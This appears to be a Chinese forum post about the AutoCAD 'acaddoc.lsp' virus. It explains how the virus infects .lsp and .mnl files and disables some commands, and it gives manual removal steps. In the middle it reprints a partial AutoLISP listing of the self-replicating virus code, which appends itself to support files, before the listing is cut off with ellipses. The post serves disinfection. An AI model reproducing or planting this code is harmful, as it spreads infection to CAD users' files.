以前的那个杀cad病毒的软件好像不起效了，新版的acaddoc.lsp感染的文件已经从lsp增加到到mnl文件了。

该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。将病毒代码（“acaddoc.lsp”文件内容）写入“*.lsp”文件内，并在“*.mnl”文件中写入“*.lsp”文件的加载路径。同时，直线命令“line”、外部参照管理命令“xref”和分解（炸开）命令“explode”无法使用。CAD系统感染该病毒文件后，只是简单搜索删除“acaddoc.lsp”文件，不能清除病毒。因为所有的“*.lsp”文件已经被修改，所有“*.lsp”文件都是病毒文件。

病毒的文件构成大概是：

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpa
path "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
);
.....
....
....

清除的办法：

1、全盘删除acaddoc.lsp（包括隐藏文件夹）
2、删除C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acaddoc.lsp和acadapq.lsp
3、删除C:\Documents and Settings\Administrator\Application。Data\Autodesk\AutoCAD 2006\R16.2\chs\Support下面的acad.mnl、acetmain.mnl和AecArchXOE.mnl。
4、删除C:\Program Files\AutoCAD 2006\Support下面所有的*****.lsp,本人用的2006版共10个****.lsp文件。
5、COPY下面附件的alsp内的两个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support，改为只读。
6、COPY下面附件的mnl内的三个文件到C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2006\R16.2\chs\Support，改为只读。
7、COPY下面附件的LSP内的十个文件到C:\Program Files\AutoCAD 2006\Support，改为只读。?

方法2：

1）搜索查看acaddoc.lsp文件，注意其文件大小，删除所有acaddoc.lsp文件；

2）搜索C盘下面的所有lsp文件，查看其大小是否跟刚才的acaddoc.lsp文件大小是否接近？如果接近可以打开查看一下，内容是否具备上面的病毒代码特征，若是符合病毒代码特征，将这些大小的lsp文件全部删除（包括且不限于天正目录下，cad安装目录下，appdata目录下）

3）搜索mnl文件，查看其文件大小是否与前面的acaddoc.lsp大小接近，如果接近打开查看是否具备病毒代码特征，若是符合则将该文件删除（或重命名）

这样操作一番下来，找个dwg文件双击打开看看，同目录下是否生成了acaddoc.lsp文件？如果没有则表明病毒被清除干净了。

?